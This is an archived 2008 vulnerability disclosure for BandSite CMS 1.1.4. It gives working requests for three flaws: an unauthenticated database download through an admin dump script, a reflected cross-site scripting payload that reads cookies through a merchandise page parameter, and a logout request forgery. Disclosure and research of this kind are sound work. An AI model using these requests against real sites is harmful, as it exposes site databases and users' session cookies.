bandsitecms-xss.txt

2008-08-22T00:00:00
ID PACKETSTORM:69306
Type packetstorm
Reporter SirGod
Modified 2008-08-22T00:00:00

Description

                                        
                                            `###########################################################################  
[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF  
[+] Discovered By SirGod   
[+] www.mortal-team.org   
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN  
###########################################################################  
  
[+] Arbitrary Download Database  
  
Go to  
  
http://localhost/[Path]/adminpanel/phpmydump.php  
  
and the download will begin ( database.sql ) .  
  
  
[+] Cross Site Scripting  
  
http://localhost/[Path]/merchandise.php?type=[XSS]  
http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script>  
  
  
[+] Cross Site Request Forgery  
  
If a logged in user with administrator privilegies click the following url he will be logged out.  
  
http://localhost/[Path]/adminpanel/logout.php  
  
  
###########################################################################  
  
`